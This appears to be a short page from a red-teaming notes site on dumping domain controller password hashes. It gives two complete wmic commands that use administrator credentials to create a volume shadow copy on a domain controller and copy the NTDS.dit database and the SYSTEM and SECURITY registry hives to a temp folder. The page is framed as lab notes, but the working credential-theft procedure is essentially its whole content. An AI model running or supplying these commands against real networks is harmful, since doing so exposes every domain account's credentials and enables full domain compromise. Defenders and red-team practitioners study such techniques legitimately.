Wmic and Vssadmin Shadow Copy

Dumping Domain Controller Hashes via wmic and Vssadmin Shadow CopyRed Teaming Experiments

# Create a shadow copy of the C drive of the Domain Controller:
CMD> wmic /node:dc01 /user:administrator@corp /password:lab process call create "cmd /c vssadmin create shadow /for=C: 2>&1"

# Copy the NTDS.dit, SYSTEM and SECURITY hives to C:\temp on the DC01:
CMD> wmic /node:dc01 /user:administrator@corp /password:lab process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit c:\temp\ & copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM c:\temp\ & copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY c:\temp\"

Previousvssadmin - no credential required NextMimikatz

Last updated 9 months ago